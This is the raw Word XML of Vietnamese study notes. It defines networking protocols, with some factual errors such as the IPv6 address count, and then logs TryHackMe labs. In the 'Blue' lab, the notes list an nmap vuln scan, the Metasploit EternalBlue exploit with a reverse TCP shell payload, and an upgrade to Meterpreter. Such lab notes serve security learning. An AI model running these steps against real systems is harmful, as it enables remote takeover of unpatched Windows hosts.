        <w:t>là để phân luồng các gói thông tin, gán IP cho các thiết bị trong hệ thống mạng. Tuy nhiên các thông tin truyền tải (trong cáp đồng, cáp quang) là analog (nó là dạng thông tin liên tục), nó khác với định dạng mà máy tính, điện thoại xử lý là digital (0 và 1) nên cần một thiết bị để đổi giữa hai thứ này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C32831" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IPv4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B44B2E4" w14:textId="2D954CFE" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>là phiên bản IP được sử dụng rộng rãi để xác định các thiết bị trên mạng bằng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hệ thống định địa chỉ. Đây là phiên bản IP đầu tiên được triển khai để sản xuất trong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>RPANET vào năm 1983. Nó sử dụng lược đồ địa chỉ 32 bit để lưu trữ 2 ^ 32 địa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chỉ, tức là hơn 4 tỷ địa chỉ. Nó được coi là Giao thức Internet chính và thực hiện</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>94% lưu lượng truy cập Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F9B69" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Giao thức không kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149E909" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Cho phép tạo một lớp giao tiếp ảo đơn giản trên các thiết bị đa dạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7DA23D" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Nó yêu cầu ít bộ nhớ hơn và dễ nhớ địa chỉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5B8D4" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Giao thức đã được hỗ trợ bởi hàng triệu thiết bị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55508AF9" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Cung cấp thư viện video và hội nghị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03254E19" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IPv6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E69D1" w14:textId="73095EBF" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>là phiên bản mới nhất của Giao thức Internet. Phiên bản địa chỉ IP mới này</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>đang được triển khai để đáp ứng nhu cầu về nhiều địa chỉ Internet hơn. Nó nhằm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>giải quyết các vấn đề liên quan đến IPv4. Với không gian địa chỉ 128-bit, nó cho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>phép 340 triệu không gian địa chỉ duy nhất. IPv6 còn được gọi là IPng (Giao thức</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Internet thế hệ tiếp theo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77024FC9" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984CAFC" w14:textId="726C1544" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>ạng đầy đủ của HTTP là Hypertext Transfer Protocol- Giao thức truyền siêu văn bản. HTTP cung cấp bộ quy tắc và tiêu chuẩn chi phối cách bất kỳ thông tin nào có thể được truyền trên World Wide Web. HTTP cung cấp các quy tắc tiêu chuẩn để trình duyệt web và máy chủ giao tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CBCBF" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778D414" w14:textId="484A458E" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">à viết tắt của Hyper Text Transfer Protocol Secure. Đây là phiên bản HTTP cao cấp và an toàn. Nó sử dụng cổng số. 443 để Truyền dữ liệu. Nó cho phép các giao dịch an toàn bằng cách mã hóa toàn bộ thông tin liên lạc với SSL. Nó là sự kết </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hợp của giao thức SSL / TLS và HTTP. Nó cung cấp nhận dạng được mã hóa và bảo mật của một máy chủ mạn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5735A" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B211D" w14:textId="0BE70F27" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>là viết tắt của “File Transfer Protocol”. Đây là một dịch vụ internet được thiết kế để thiết lập kết nối với máy chủ hoặc máy tính cụ thể. Do đó, người dùng có thể chuyển tệp (download) hoặc truyền dữ liệu / tệp vào máy tính của họ hoặc máy chủ FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2F4C1" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SFTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CFB46" w14:textId="219CE0B0" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>(full form SSH File Transfer Protocol-giao thức truyền tệp SSH dạng đầy đủ) là một phần của bộ giao thức SSH. Nó cung cấp truyền tệp an toàn qua SSH để cung cấp quyền truy cập vào tất cả các tài khoản shell trên máy chủ SFTP từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C4F439" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64834D" w14:textId="608FD6AC" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>SMB là một giao thức chia sẻ file phổ biên hien nay khi người sử dụng hệ điều hanh Windows. SMB sẽ được sử dụng ở chế độ mặc đinh trên các nền tảng nhu Win 7 8 10 khi chia sẻ fil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1D7D4" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B6BAA" w14:textId="16EAEC61" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>Dynamic Host Configuration Protocol (giao thức cấu hinh máy chủ): có nhiệm vụ giúp quản lý nhanh tự động và tập trung việc phân phối địa chỉ IP ben trong 1 mạng. Ngoài ra DHCP còn giúp đưa thông tin đến các thiết bị hợp lý hơn cung như việc cấu hinh subnetmask hay gateway default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44794FD5" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B01C8" w14:textId="7CF8840E" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>DNS là từ viết tắt trong tiếng Anh của Domain Name System, là Hệ thống phân giải tên, chỉ một hệ thống cho phép thiết lập tương ứng giữa địa chỉ IP và tên miền. Hê thống tên miền DNS là một hệ thống đặt tên theo thứ tư cho máy tính, dịch vụ hoặc bất cứ j trong internet. Nó liên kết nhiều thông tin đa dạng với tên miền được gán cho nhưng người tham gia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF050B" w14:textId="40A16FDB" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8"/>
    <w:p w14:paraId="0C4CFDE0" w14:textId="79DFA9C8" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------------------(</w:t>
      </w:r>
      <w:r w:rsidR="00A27DF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14815C5D" w14:textId="16E327DA" w:rsidR="00A27DF0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tìm hiểu về metasploit và làm lab trên tryhackme: Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C8E52" w14:textId="16660F1F" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Các lệnh meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645ED69A" w14:textId="3E8AA238" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Các lệnh hệ thống tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E1569" w14:textId="216E079B" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Các lệnh mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15269543" w14:textId="2FEC6E03" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lệnh hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C452B8E" w14:textId="252B5CEC" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Các lệnh khác (chúng sẽ được liệt kê trong các danh mục menu khác nhau trong menu trợ giúp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E1FF8" w14:textId="1A3EC024" w:rsidR="00A27DF0" w:rsidRPr="00A27DF0" w:rsidRDefault="00A27DF0" w:rsidP="00A27DF0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661EB1EB" w14:textId="6E503A66" w:rsidR="00B841A8" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành với meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD4502" w14:textId="5F5D67C9" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFB5571" wp14:editId="1095B03A">
            <wp:extent cx="6188710" cy="4783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783455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63795E" w14:textId="0D1FD28F" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tryhackme: Blue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07AFA3" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>check vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD6B5A" w14:textId="60598886" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sV -vv --script vuln TARGET_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D773E3" w14:textId="29B88B35" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>servers: ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D4D170" w14:textId="7F22EEE0" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175E67F2" wp14:editId="1BC66D7C">
            <wp:extent cx="3057952" cy="198147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1981477"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F289BBD" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>có 3 port &lt; 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3302EE" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F78BAB1" w14:textId="33EB9C65" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368382CF" wp14:editId="6E3E1B49">
            <wp:extent cx="5268060" cy="101931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1019317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA99AE" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB9665" w14:textId="34AF1C92" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7CC6E" w14:textId="14459D53" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="087441E9" wp14:editId="6F9DD01B">
            <wp:extent cx="6188710" cy="1061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061085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="654ACAE4" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB13E9C" w14:textId="01BDDAA5" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// thiet lap shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E8FF94A" wp14:editId="7753EAA1">
            <wp:extent cx="6188710" cy="2676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676525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DD3AB0D" wp14:editId="59AA9FB5">
            <wp:extent cx="6188710" cy="3048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048635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B799107" w14:textId="629D44AA" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727C85C6" wp14:editId="23E350BE">
            <wp:extent cx="6188710" cy="2973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46601E13" w14:textId="23E09E32" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tryhackme: Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023385C" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEE095" w14:textId="6B851E83" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agents sẽ là nơi bạn thực hiện phần lớn tương tác trong Starkiller. menu này sẽ cho phép bạn xem tổng quan về tất cả các</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và tương tác với các agents cụ thể. Agents giống như shells bạn có thể gửi các lệnh shell và modules từ các agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A7BC3" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3A02D" w14:textId="3D176DEA" w:rsidR="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Menu Mô-đun sẽ cung cấp cái nhìn tổng quan về tất cả các mô-đun có sẵn và cho phép bạn tìm kiếm một mô-đun cụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB32F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">thể. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F389F" w14:textId="77777777" w:rsidR="00AB32F0" w:rsidRPr="00AB32F0" w:rsidRDefault="00AB32F0" w:rsidP="00AB32F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
